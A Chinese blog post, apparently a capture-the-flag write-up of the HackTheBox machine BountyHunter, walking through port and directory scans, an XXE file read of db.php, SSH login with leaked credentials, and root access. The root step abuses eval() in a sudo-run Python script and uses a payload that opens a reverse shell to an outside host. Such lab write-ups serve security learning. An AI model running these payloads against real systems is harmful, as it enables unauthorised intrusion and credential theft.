HackTheBox-BountyHunter WP

最新推荐文章于 2024-10-16 11:02:39 发布
最新推荐文章于 2024-10-16 11:02:39 发布
阅读量567 收藏
点赞数
分类专栏: HackTheBox 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a709046532/article/details/120166885
版权

0x01 信息收集


端口信息

image-20210905162026669



目录扫描

image-20210905161800851




0x02 打靶

一通乱点后来到一个后台地址:

image-20210905123140302



提交后在burp中能够发现网站和后台通信的数据:

image-20210905123307253



进行URL解码和BASE64解码后发现是xml:

image-20210905123338095



于是可以试试XXE,首先读取文件:

image-20210905123403065



成功了,接下来可以试试读取别的文件:

image-20210905123428344



但是该读什么文件呢,在之前的扫描目录可以发现db.php,于是尝试读取db.php

<?xml version="1.0"?>
<!DOCTYPE ANY [
    <!ENTITY test SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/db.php">
    ]>
    <bugreport>
    <title>dfg</title>
    <cwe>dfg</cwe>
    <cvss>&test;</cvss>
    <reward>dfg</reward>
    </bugreport>


在拿到Base64字符串后拿去解码,可以拿到账户和密码:

image-20210905124114252



但是之前的扫描端口发现数据库并没有开放外联,但总归是拿到了敏感信息的。然后还开放了ssh,我们可以试着去撞库。

这里我们可以使用/etc/passwd中拿到的账户做字典去跑。但是用户数量比较少我就选择了一个个试,最后试出了development账户:

image-20210905130216528




0x03 提权

在进行一些信息收集后,我使用命令

sudo -l

发现存在某个校验票据的脚本:

image-20210905130456254



查看该脚本,该脚本是只读的。但是能够发现脚本使用了危险的函数eval

image-20210905131218741



关键函数截取如下:

def evaluate(ticketFile):
    #Evaluates a ticket to check for ireggularities.
    code_line = None
    for i,x in enumerate(ticketFile.readlines()):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "):
                return False
            print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
            continue

        if x.startswith("__Ticket Code:__"):
            code_line = i+1
            continue

        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            ticketCode = x.replace("**", "").split("+")[0]
            if int(ticketCode) % 7 == 4:
                validationNumber = eval(x.replace("**", ""))


逻辑很好理解,我们需要根据代码执行逻辑一步步走直到eval被执行。于是最后的payload如下:

# Skytrain Inc
## Ticket to 
__Ticket Code:__
**11+10==__import__('subprocess').call("echo 'sh -i >& /dev/tcp/10.10.14.46/2333 0>&1'>x && bash x && rm -rf x",shell=True)


执行命令并开启监听,即可拿到shell:

sudo /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py

拿到root的shell后在家目录下即可拿到secret:

image-20210905160136136




0x04 参考

https://blog.csdn.net/whatday/article/details/102748376

h1nt
关注
专栏目录
hackthebox-Bounty (考点:上传/IIS7.5安全/windows)
冬萍子癸水
04-16 475
nmap 就一个80,没啥别的,扫出来显示是iis7.5,说明很可能这就是个突破口&考点 因为是iis,所以对于asp&aspx文件是要重视的,在拿dirbuster扫时也要添加这俩后缀文件名 扫出 打开看第一个是上传,然后在第二个里读取 经验证,随便传图片,读取成功。那么突破思路就是上传了。 但我试了很多php和aspx,都没用,让人郁闷 只好搜iis7.5 rce up...
Dota2技能系统设计分析
langresser的专栏
07-06 9753
前两周写完了新游戏的技能系统。虽然也算灵活,但是跟Dota2的技能系统设计比起来,就差了很多。无论从灵活性还是功能实现上,其技能系统设计的都相当漂亮。如果早一些分析它的技能系统的话,我想我可以实现的更快更好。         与之类比还有一些游戏,其技能系统设计的也很漂亮,比如魔兽争霸3  火炬之光2   星际争霸2,它们都很灵活,从其众多的MOD就可以看出来,甚至MOD的作者可以做出游戏开发者
hackthebox --BountyHunter
weixin_47156475的博客
08-13 469
文章目录一、信息收集二、getshell三、提权总结 一、信息收集 先扫描一下,看看开启了哪些端口,哪些服务,以及哪些敏感目录 经过一番搜素以及检查,发现并不存在服务漏洞,也没有什么敏感的目录 于是扩大目录的扫描范围 : 发现一个叫db.php的文件以及一个叫resources的文件夹,访问resources文件夹的结果如下: db.php访问没有任何信息 于是老老实实地去80端口访问 到处点点点,然后发现了一个提交页面 抓包分析一下 data里面的数据是先base64加密,然后在url加密
Hack the box靶机 Bounty
菜浪马废的博客
06-03 504
两个页面都是没有权限不能访问 但是也没有扫出来登录页面 投个图 他们换了本字典 我懒得扫了 有过滤 上传了一个shell.php.gif绕过了 找到一篇博客 上传.config 使用nishang的Invoke-PowerShellTcp.ps1的时候 需要在这个文件末尾加入调用 Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 443 然后就可以连接了 没有补丁 那ms15-051 完成 ...
HackTheBox::BountyHunter
aya3t的博客
10-24 398
HackTheBox::BountyHunter
HackTheBox-BountyHunter靶场通关记录
weixin_43876438的博客
10-26 2873
文章目录HackTheBox-BountyHunter靶场准备工作信息搜集漏洞利用提权 HackTheBox-BountyHunter靶场 准备工作 打开hackthebox并找到bountyhunter靶场,关注并获取到IP地址 在hackthebox中下载vpn Kali虚拟机,并运行指定的vpn 信息搜集 我拿到的IP地址为:10.10.11.100 使用nmap进行端口扫描,看看开放了哪些端口。sudo nmap -Pn -sS -p- 10.10.11.100 可以看到开放了22端
BountyHunter:第一人称射击
02-26
10. **版本控制**:文件名中出现的"BountyHunter-master"可能表明项目使用了Git进行版本控制,这是一种广泛使用的分布式版本控制系统,有助于团队协作和代码管理。 综上所述,"BountyHunter"项目涵盖了C++编程、...
BountyHunter_GAME:CRE311的游戏存储库
02-12
【标题】"BountyHunter_GAME:CRE311的游戏存储库"揭示了这是一款由CRE311开发的游戏项目,其源代码或资源被存储在名为"BountyHunter_GAME"的仓库中。通常,这种类型的存储库是开源或者用于教学目的,以便其他开发者...
bountyhunter:用Dart编写的搜索引擎,可在浏览器或服务器上执行
05-11
赏金猎人 非结构化文档的全文本搜索引擎。 它基于反向索引。 使用简单 首先创建实例 Cargo storage = new Cargo(MODE: CargoMode.MEMORY); 构造一个Hunter实例。 Hunter hunter = new Hunter( cargo );...
avastars-bounty-hunter:Avastars的赏金猎人工具
05-13
s.src = "https://cdn.jsdelivr.net/gh/kaigani/avastars-bounty-hunter@a0f0fd5115a14c772052027bccdf9334567f2379/_bountyHunter_app.min.js";document.head.appendChild(s)})() 打开 页面完全加载后,单击小书签
HTB-BountyHunter
TA不懒,但还没有添加简介
01-25 1095
HTB-BountyHunter
BountyHunter
qq_40201047的博客
11-06 532
HTB-Machines-BountyHunter 文章目录HTB-Machines-BountyHunter0x01 信息收集1.1 端口嗅探1.2 目录扫描1.3 端口爆破0x02 打点立足2.1 分析数据包2.2 XML实体注入0x03 权限提升0x04 参考链接 0x01 信息收集 1.1 端口嗅探 ​ 使用Nmap对10.129.251.221进行端口嗅探,服务器开放80端口和22端口,常规思路①爆破22端口②对80端口的页面进行目录扫描。 1.2 目录扫描 ​ 使用Dirsea
Hackthebox:Bounty Walkthrough(not use metasploit)
汗的博客
12-18 389
Bounty是一台Hackthebox的windows靶机,难度3.4
htb-Bounty
2201_75378806的博客
05-15 1994
端口扫描该网站本身只是提供了一个向导的图像merlin.jpgf12 抓包响应标头表明该站点由以下人员提供支持ASP.NETgobuster -u http://10.10.10.93 -w usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -o gobuster_root -x aspx爆破目录呈现一个带有“浏览...”和“上传”按钮的简单表单:上传一个图片看看aspx shell 的副本,并尝试上传它。
HTB-oscplike-Bounty+Jerry+Conceal
m0_53302733的博客
04-08 929
HTB-oscplike-Bounty+Jerry+Conceal Bounty easy难度的bounty 靶机IP 10.10.10.93 sudo nmap -sS -sV -A -p- --min-rate=5000 -Pn 10.10.10.93 80/tcp open http Microsoft IIS httpd 7.5 进去就一张图 wfuzz+dirsearch 扫到aspnet_client 又是aspx的马 uploadfiles没权限进 发现/transfer.aspx可以
Hack The Box】windows练习-- Bounty
人间体佐菲的博客
10-31 630
Hack The Box】windows练习-- Bounty
No.59-HackTheBox-windows-Bounty-Walkthrough渗透学习
qq_34801745的博客
02-20 752
** HackTheBox-windows-Bounty-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/142 靶机难度:初级(3.7/10) 靶机发布日期:2018年11月2日 靶机描述: Bounty is an easy to medium difficulty machine, which featu...
实战HackTheBox里面的Beep
知柯信安
01-11 1662
与之前一样,第一步是运行Nmap扫描以识别正在运行的信息。 # Nmap 7.80 scan initiated Sun Aug 23 06:24:25 2020 as: nmap -oN scan -sV -O -p- -sC 10.10.10.7 Nmap scan report for 10.10.10.7 Host is up (0.033s latency). Not shown: 65519 closed ports PORT STATE SERVICE VERSION 22/t
Spring Boot视频网站:安全与可扩展性设计
最新发布
2401_85702623的博客
10-16 615
本次程序开发选用的数据库管理工具是MySQL数据管理工具,使用它存放数据也需要创建程序对应的数据库文件,并命名刚创建的数据库文件,有了数据库也需要创建各种数据表来充实数据库,在数据表的创建中,不仅需要对数据表命名,也需要对数据表的字段进行设计,包括每个数据表里面需要设置的字段名称,字段对应的数据类型信息,字段的主键设置这个也是不可缺少的,因为每个数据表里面的主键就是标记着这个数据表跟其他数据表相区分的唯一标志。addtime timestamp 否 CURRENT_TIMESTAMP 创建时间。
【WEB应用安全测试指南–蓝队安全测试2】--超详细-可直接进行实战!!!亲测-可进行安全及渗透测试
Dreams°的博客
10-10 2109
任意文件下载漏洞不同于网站目录浏览,此漏洞不仅仅可遍历系统下 web中的文件,而且可以浏览或者下载到系统中的文件,攻击人员通过任意文件下载漏洞可以获取系统文件及服务器的配置文件等等。一般来说,他们利用服务器 API、文件标准权限进行攻击。严格来说,任意文件下载漏洞并不是一种 web漏洞,而是网站设计人员的设计“漏洞”
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

h1nt

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值